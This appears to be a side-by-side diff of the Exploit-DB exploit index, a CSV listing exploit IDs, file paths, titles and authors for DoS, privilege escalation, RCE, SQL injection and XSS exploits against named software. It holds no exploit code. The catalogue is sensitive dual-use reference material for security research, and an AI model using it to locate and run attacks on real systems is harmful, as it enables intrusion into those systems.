50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 50002,exploits/ios/dos/50002.py,"Post-it 5.0.1 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios, 50003,exploits/ios/dos/50003.py,"Notex the best notes 6.4 - Denial of Service (PoC)",1970-01-01,"Geovanni Ruiz",dos,ios,
50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows, 50153,exploits/windows/dos/50153.py,"Leawo Prof. Media 11.0.0.1 - Denial of Service (DoS) (PoC)",1970-01-01,stresser,dos,windows,
50247,exploits/windows/dos/50247.py,"Telegram Desktop 2.9.2 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",dos,windows,
50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)",1970-01-01,"Eric Salario",dos,windows, 50266,exploits/windows/dos/50266.py,"SmartFTP Client 10.0.2909.0 - 'Multiple' Denial of Service (PoC)",1970-01-01,"Eric Salario",dos,windows,
50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows, 50322,exploits/windows/dos/50322.py,"Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial of Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows, 50433,exploits/windows/dos/50433.py,"NIMax 5.3.1 - 'Remote VISA System' Denial of Service (PoC)",1970-01-01,LinxzSec,dos,windows,
@ -11270,8 +11285,13 @@ id,file,description,date,author,type,platform,port
49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",1970-01-01,1F98D,local,windows, 49382,exploits/windows/local/49382.ps1,"PaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege Escalation",1970-01-01,1F98D,local,windows,
49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",1970-01-01,1F98D,local,java, 49384,exploits/java/local/49384.txt,"H2 Database 1.4.199 - JNI Code Execution",1970-01-01,1F98D,local,java,
49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",1970-01-01,rootabeta,local,windows, 49409,exploits/windows/local/49409.py,"PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval",1970-01-01,rootabeta,local,windows,
50465,exploits/linux/local/50465.c,"Mini-XML 3.2 - Heap Overflow",1970-01-01,LIWEI,local,linux,
49453,exploits/windows/local/49453.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation",1970-01-01,LiquidWorm,local,windows, 49453,exploits/windows/local/49453.txt,"Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation",1970-01-01,LiquidWorm,local,windows,
49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",1970-01-01,"Justin Steven",local,multiple, 49491,exploits/multiple/local/49491.py,"Metasploit Framework 6.0.11 - msfvenom APK template command injection",1970-01-01,"Justin Steven",local,multiple,
49514,exploits/solaris/local/49514.c,"Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2)",1970-01-01,"Marco Ivaldi",local,solaris,
49515,exploits/solaris/local/49515.c,"Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3)",1970-01-01,"Marco Ivaldi",local,solaris,
49516,exploits/solaris/local/49516.c,"Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1)",1970-01-01,"Marco Ivaldi",local,solaris,
49517,exploits/solaris/local/49517.c,"Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2)",1970-01-01,"Marco Ivaldi",local,solaris,
49521,exploits/multiple/local/49521.py,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)",1970-01-01,"West Shepherd",local,multiple, 49521,exploits/multiple/local/49521.py,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (1)",1970-01-01,"West Shepherd",local,multiple,
49522,exploits/multiple/local/49522.c,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)",1970-01-01,nu11secur1ty,local,multiple, 49522,exploits/multiple/local/49522.c,"Sudo 1.9.5p1 - 'Baron Samedit ' Heap-Based Buffer Overflow Privilege Escalation (2)",1970-01-01,nu11secur1ty,local,multiple,
49526,exploits/multiple/local/49526.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution",1970-01-01,LiquidWorm,local,multiple, 49526,exploits/multiple/local/49526.txt,"SmartFoxServer 2X 2.17.0 - God Mode Console Remote Code Execution",1970-01-01,LiquidWorm,local,multiple,
@ -11315,6 +11335,7 @@ id,file,description,date,author,type,platform,port
49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",1970-01-01,"Alan Mondragon",local,windows, 49704,exploits/windows/local/49704.txt,"Elodea Event Collector 4.9.3 - 'ElodeaEventCollectorService' Unquoted Service Path",1970-01-01,"Alan Mondragon",local,windows,
49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",1970-01-01,"Mohammed Alshehri",local,windows, 49706,exploits/windows/local/49706.txt,"Ext2Fsd v0.68 - 'Ext2Srv' Unquoted Service Path",1970-01-01,"Mohammed Alshehri",local,windows,
49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",1970-01-01,"George Tsimpidas",local,windows, 49739,exploits/windows/local/49739.txt,"Rockstar Service - Insecure File Permissions",1970-01-01,"George Tsimpidas",local,windows,
49765,exploits/linux/local/49765.txt,"MariaDB 10.2 - 'wsrep_provider' OS Command Execution",1970-01-01,"Central InfoSec",local,linux,
49841,exploits/windows/local/49841.txt,"Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation",1970-01-01,LiquidWorm,local,windows, 49841,exploits/windows/local/49841.txt,"Epic Games Easy Anti-Cheat 4.0 - Local Privilege Escalation",1970-01-01,LiquidWorm,local,windows,
49842,exploits/windows/local/49842.txt,"Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49842,exploits/windows/local/49842.txt,"Sandboxie Plus 0.7.4 - 'SbieSvc' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49845,exploits/windows/local/49845.txt,"WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49845,exploits/windows/local/49845.txt,"WifiHotSpot 1.0.0.0 - 'WifiHotSpotService.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
@ -11323,12 +11344,15 @@ id,file,description,date,author,type,platform,port
49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",1970-01-01,1F98D,local,windows, 49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",1970-01-01,1F98D,local,windows,
49863,exploits/windows_x86-64/local/49863.js,"Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free",1970-01-01,"Forrest Orr",local,windows_x86-64,
49864,exploits/windows_x86-64/local/49864.js,"Firefox 72 IonMonkey - JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows_x86-64, 49864,exploits/windows_x86-64/local/49864.js,"Firefox 72 IonMonkey - JIT Type Confusion",1970-01-01,"Forrest Orr",local,windows_x86-64,
49872,exploits/windows/local/49872.js,"Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free",1970-01-01,SlidingWindow,local,windows, 49872,exploits/windows/local/49872.js,"Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free",1970-01-01,SlidingWindow,local,windows,
49882,exploits/windows/local/49882.ps1,"Visual Studio Code 1.47.1 - Denial of Service (PoC)",1970-01-01,"H.H.A.Ravindu Priyankara",local,windows,
49888,exploits/windows/local/49888.txt,"ASUS HID Access Service 1.0.94.0 - 'AsHidSrv.exe' Unquoted Service Path",1970-01-01,"Alejandra Sánchez",local,windows, 49888,exploits/windows/local/49888.txt,"ASUS HID Access Service 1.0.94.0 - 'AsHidSrv.exe' Unquoted Service Path",1970-01-01,"Alejandra Sánchez",local,windows,
49889,exploits/windows/local/49889.txt,"Backup Manager Module 3.0.0.99 - 'IScheduleSvc.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows, 49889,exploits/windows/local/49889.txt,"Backup Manager Module 3.0.0.99 - 'IScheduleSvc.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows,
49890,exploits/windows/local/49890.txt,"Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows, 49890,exploits/windows/local/49890.txt,"Acer Updater Service 1.2.3500.0 - 'UpdaterService.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows,
49892,exploits/windows/local/49892.py,"Mozilla Firefox 88.0.1 - File Extension Execution of Arbitrary Code",1970-01-01,"BestEffort Team",local,windows, 49892,exploits/windows/local/49892.py,"Mozilla Firefox 88.0.1 - File Extension Execution of Arbitrary Code",1970-01-01,"BestEffort Team",local,windows,
49893,exploits/windows/local/49893.c++,"DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE)",1970-01-01,"Paolo Stagno",local,windows,
49899,exploits/windows/local/49899.txt,"DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows, 49899,exploits/windows/local/49899.txt,"DiskBoss Service 12.2.18 - 'diskbsa.exe' Unquoted Service Path",1970-01-01,"Erick Galindo",local,windows,
49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows, 49900,exploits/windows/local/49900.txt,"ePowerSvc 6.0.3008.0 - 'ePowerSvc.exe' Unquoted Service Path",1970-01-01,"Emmanuel Lujan",local,windows,
49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",1970-01-01,"Víctor García",local,windows, 49925,exploits/windows/local/49925.txt,"Veyon 4.4.1 - 'VeyonService' Unquoted Service Path",1970-01-01,"Víctor García",local,windows,
@ -11362,6 +11386,7 @@ id,file,description,date,author,type,platform,port
50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",1970-01-01,"Andrea Intilangelo",local,windows, 50184,exploits/windows/local/50184.txt,"Amica Prodigy 1.7 - Privilege Escalation",1970-01-01,"Andrea Intilangelo",local,windows,
50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",1970-01-01,"Vishwaraj Bhattrai",local,android, 50188,exploits/android/local/50188.txt,"Xiaomi browser 10.2.4.g - Browser Search History Disclosure",1970-01-01,"Vishwaraj Bhattrai",local,android,
50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 - Unquoted Service Path",1970-01-01,shinnai,local,windows, 50212,exploits/windows/local/50212.txt,"SonicWall NetExtender 10.2.0.300 - Unquoted Service Path",1970-01-01,shinnai,local,windows,
50236,exploits/linux/local/50236.py,"MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2)",1970-01-01,ninpwn,local,linux,
50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50258,exploits/windows/local/50258.txt,"Remote Mouse 4.002 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50261,exploits/windows/local/50261.txt,"Argus Surveillance DVR 4.0 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows, 50273,exploits/windows/local/50273.txt,"Active WebCam 11.5 - Unquoted Service Path",1970-01-01,"Salman Asad",local,windows,
@ -11372,6 +11397,7 @@ id,file,description,date,author,type,platform,port
50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows, 50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows, 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows,
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux, 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux,
50401,exploits/windows/local/50401.txt,"Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows,
50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows, 50416,exploits/windows/local/50416.txt,"SolarWinds Kiwi CatTools 3.11.8 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
50431,exploits/windows/local/50431.txt,"Macro Expert 4.7 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows, 50431,exploits/windows/local/50431.txt,"Macro Expert 4.7 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
50443,exploits/windows/local/50443.txt,"Netgear Genie 2.4.64 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows, 50443,exploits/windows/local/50443.txt,"Netgear Genie 2.4.64 - Unquoted Service Path",1970-01-01,"Mert Daş",local,windows,
@ -18504,6 +18530,7 @@ id,file,description,date,author,type,platform,port
49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",1970-01-01,"Google Security Research",remote,linux, 49754,exploits/linux/remote/49754.c,"Linux Kernel 5.4 - 'BleedingTooth' Bluetooth Zero-Click Remote Code Execution",1970-01-01,"Google Security Research",remote,linux,
49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",1970-01-01,HerculesRD,remote,unix, 49757,exploits/unix/remote/49757.py,"vsftpd 2.3.4 - Backdoor Command Execution",1970-01-01,HerculesRD,remote,unix,
49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",1970-01-01,BenChaliah,remote,hardware, 49782,exploits/hardware/remote/49782.py,"Tenda D151 & D301 - Configuration Download (Unauthenticated)",1970-01-01,BenChaliah,remote,hardware,
49815,exploits/linux/remote/49815.py,"GNU Wget < 1.18 - Arbitrary File Upload (2)",1970-01-01,liewehacksie,remote,linux,
49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",1970-01-01,legend,remote,solaris, 49896,exploits/solaris/remote/49896.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (2)",1970-01-01,legend,remote,solaris,
49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",1970-01-01,Shellbr3ak,remote,linux, 49908,exploits/linux/remote/49908.py,"ProFTPd 1.3.5 - 'mod_copy' Remote Command Execution (2)",1970-01-01,Shellbr3ak,remote,linux,
49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",1970-01-01,sirpedrotavares,remote,hardware, 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",1970-01-01,sirpedrotavares,remote,hardware,
@ -26055,12 +26082,14 @@ id,file,description,date,author,type,platform,port
49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",1970-01-01,"Aitor Herrero",webapps,php, 49439,exploits/php/webapps/49439.txt,"Life Insurance Management System 1.0 - 'client_id' SQL Injection",1970-01-01,"Aitor Herrero",webapps,php,
49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",1970-01-01,"Aitor Herrero",webapps,php, 49440,exploits/php/webapps/49440.txt,"Life Insurance Management System 1.0 - File Upload RCE (Authenticated)",1970-01-01,"Aitor Herrero",webapps,php,
49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",1970-01-01,"Talat Mehmood",webapps,php, 49441,exploits/php/webapps/49441.txt,"osTicket 1.14.2 - SSRF",1970-01-01,"Talat Mehmood",webapps,php,
50463,exploits/multiple/webapps/50463.txt,"WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS)",1970-01-01,3ndG4me,webapps,multiple,
49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",1970-01-01,"Rob McCarthy",webapps,multiple, 49443,exploits/multiple/webapps/49443.py,"ChurchRota 2.6.4 - RCE (Authenticated)",1970-01-01,"Rob McCarthy",webapps,multiple,
49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",1970-01-01,omurugur,webapps,multiple, 49444,exploits/multiple/webapps/49444.txt,"Oracle Business Intelligence Enterprise Edition 11.1.1.7.140715 - Stored XSS",1970-01-01,omurugur,webapps,multiple,
49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",1970-01-01,"Richard Jones",webapps,php, 49445,exploits/php/webapps/49445.py,"Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)",1970-01-01,"Richard Jones",webapps,php,
50461,exploits/php/webapps/50461.html,"PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)",1970-01-01,"Anubhav Singh",webapps,php, 50461,exploits/php/webapps/50461.html,"PHPGurukul Hostel Management System 2.1 - Cross-site request forgery (CSRF) to Cross-site Scripting (XSS)",1970-01-01,"Anubhav Singh",webapps,php,
49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",1970-01-01,"CANKAT ÇAKMAK",webapps,php, 49447,exploits/php/webapps/49447.txt,"Online Documents Sharing Platform 1.0 - 'user' SQL Injection",1970-01-01,"CANKAT ÇAKMAK",webapps,php,
49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",1970-01-01,"Siva Rajendran",webapps,php, 49433,exploits/php/webapps/49433.txt,"Alumni Management System 1.0 - _Last Name field in Registration page_ Stored XSS",1970-01-01,"Siva Rajendran",webapps,php,
49434,exploits/php/webapps/49434.py,"E-Learning System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php,
49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)",1970-01-01,AkkuS,webapps,multiple, 49435,exploits/multiple/webapps/49435.rb,"Netsia SEBA+ 0.16.1 - Add Root User (Metasploit)",1970-01-01,AkkuS,webapps,multiple,
40091,exploits/php/webapps/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",1970-01-01,"Mehmet Ince",webapps,php,80 40091,exploits/php/webapps/40091.rb,"Tiki Wiki 15.1 - File Upload (Metasploit)",1970-01-01,"Mehmet Ince",webapps,php,80
30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",1970-01-01,"Ory Segal",webapps,php, 30170,exploits/php/webapps/30170.txt,"Beehive Forum 0.7.1 - 'links.php' Multiple Cross-Site Scripting Vulnerabilities",1970-01-01,"Ory Segal",webapps,php,
@ -43323,6 +43352,7 @@ id,file,description,date,author,type,platform,port
48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",1970-01-01,"Dylan Garnaud",webapps,java, 48459,exploits/java/webapps/48459.txt,"Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting",1970-01-01,"Dylan Garnaud",webapps,java,
48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",1970-01-01,Besim,webapps,php, 48460,exploits/php/webapps/48460.txt,"qdPM 9.1 - Arbitrary File Upload",1970-01-01,Besim,webapps,php,
48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",1970-01-01,"Anthony Cole",webapps,java, 48462,exploits/java/webapps/48462.py,"TylerTech Eagle 2018.3.11 - Remote Code Execution",1970-01-01,"Anthony Cole",webapps,java,
49574,exploits/php/webapps/49574.txt,"PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting",1970-01-01,"Anmol K Sachan",webapps,php,
49575,exploits/php/webapps/49575.txt,"Comment System 1.0 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Pintu Solanki",webapps,php, 49575,exploits/php/webapps/49575.txt,"Comment System 1.0 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Pintu Solanki",webapps,php,
49576,exploits/php/webapps/49576.txt,"Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass",1970-01-01,"Suresh Kumar",webapps,php, 49576,exploits/php/webapps/49576.txt,"Online Exam System With Timer 1.0 - 'email' SQL injection Auth Bypass",1970-01-01,"Suresh Kumar",webapps,php,
49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Kamil Breński",webapps,multiple, 49578,exploits/multiple/webapps/49578.txt,"OpenText Content Server 20.3 - 'multiple' Stored Cross-Site Scripting",1970-01-01,"Kamil Breński",webapps,multiple,
@ -43732,6 +43762,7 @@ id,file,description,date,author,type,platform,port
49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",1970-01-01,Synacktiv,webapps,hardware, 49308,exploits/hardware/webapps/49308.js,"Sony Playstation 4 (PS4) < 6.72 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",1970-01-01,Synacktiv,webapps,hardware,
49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",1970-01-01,ChendoChap,webapps,hardware, 49309,exploits/hardware/webapps/49309.js,"Sony Playstation 4 (PS4) < 7.02 - 'ValidationMessage::buildBubbleTree()' Use-After-Free WebKit Code Execution (PoC)",1970-01-01,ChendoChap,webapps,hardware,
49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",1970-01-01,Mosaaed,webapps,php, 49310,exploits/php/webapps/49310.txt,"Victor CMS 1.0 - File Upload To RCE",1970-01-01,Mosaaed,webapps,php,
49726,exploits/php/webapps/49726.py,"GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting",1970-01-01,boku,webapps,php,
49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",1970-01-01,"Matthew Aberegg",webapps,php, 49312,exploits/php/webapps/49312.txt,"Pandora FMS 7.0 NG 750 - 'Network Scan' SQL Injection (Authenticated)",1970-01-01,"Matthew Aberegg",webapps,php,
49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",1970-01-01,"Musyoka Ian",webapps,php, 49314,exploits/php/webapps/49314.txt,"CSE Bookstore 1.0 - Multiple SQL Injection",1970-01-01,"Musyoka Ian",webapps,php,
49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",1970-01-01,"Kislay Kumar",webapps,php, 49315,exploits/php/webapps/49315.txt,"Library Management System 3.0 - _Add Category_ Stored XSS",1970-01-01,"Kislay Kumar",webapps,php,
@ -43776,6 +43807,7 @@ id,file,description,date,author,type,platform,port
49364,exploits/php/webapps/49364.txt,"CSZ CMS 1.2.9 - Multiple Cross-Site Scripting",1970-01-01,SunCSR,webapps,php, 49364,exploits/php/webapps/49364.txt,"CSZ CMS 1.2.9 - Multiple Cross-Site Scripting",1970-01-01,SunCSR,webapps,php,
49365,exploits/php/webapps/49365.py,"Online Learning Management System 1.0 - RCE (Authenticated)",1970-01-01,"Bedri Sertkaya",webapps,php, 49365,exploits/php/webapps/49365.py,"Online Learning Management System 1.0 - RCE (Authenticated)",1970-01-01,"Bedri Sertkaya",webapps,php,
49366,exploits/php/webapps/49366.py,"Klog Server 2.4.1 - Command Injection (Unauthenticated)",1970-01-01,B3KC4T,webapps,php, 49366,exploits/php/webapps/49366.py,"Klog Server 2.4.1 - Command Injection (Unauthenticated)",1970-01-01,B3KC4T,webapps,php,
49367,exploits/multiple/webapps/49367.txt,"EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting",1970-01-01,"Mesut Cetin",webapps,multiple,
49369,exploits/php/webapps/49369.txt,"Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Rahul Ramakant Singh",webapps,php, 49369,exploits/php/webapps/49369.txt,"Advanced Webhost Billing System 3.7.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,"Rahul Ramakant Singh",webapps,php,
49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",1970-01-01,MoeAlBarbari,webapps,multiple, 49372,exploits/multiple/webapps/49372.txt,"IPeakCMS 3.5 - Boolean-based blind SQLi",1970-01-01,MoeAlBarbari,webapps,multiple,
49373,exploits/php/webapps/49373.txt,"Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting",1970-01-01,"Shivam Verma",webapps,php, 49373,exploits/php/webapps/49373.txt,"Expense Tracker 1.0 - 'Expense Name' Stored Cross-Site Scripting",1970-01-01,"Shivam Verma",webapps,php,
@ -43835,8 +43867,10 @@ id,file,description,date,author,type,platform,port
49456,exploits/hardware/webapps/49456.txt,"Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 49456,exploits/hardware/webapps/49456.txt,"Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49457,exploits/hardware/webapps/49457.txt,"Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 49457,exploits/hardware/webapps/49457.txt,"Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49458,exploits/hardware/webapps/49458.html,"Selea Targa IP OCR-ANPR Camera - CSRF Add Admin",1970-01-01,LiquidWorm,webapps,hardware, 49458,exploits/hardware/webapps/49458.html,"Selea Targa IP OCR-ANPR Camera - CSRF Add Admin",1970-01-01,LiquidWorm,webapps,hardware,
49459,exploits/hardware/webapps/49459.txt,"Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49460,exploits/hardware/webapps/49460.sh,"Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 49460,exploits/hardware/webapps/49460.sh,"Selea Targa IP OCR-ANPR Camera - 'addr' Remote Code Execution (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
49461,exploits/java/webapps/49461.py,"Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)",1970-01-01,Photubias,webapps,java, 49461,exploits/java/webapps/49461.py,"Oracle WebLogic Server 14.1.1.0 - RCE (Authenticated)",1970-01-01,Photubias,webapps,java,
49462,exploits/php/webapps/49462.py,"Library System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php,
49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php, 49463,exploits/php/webapps/49463.py,"CASAP Automated Enrollment System 1.0 - Authentication Bypass",1970-01-01,"Himanshu Shukla",webapps,php,
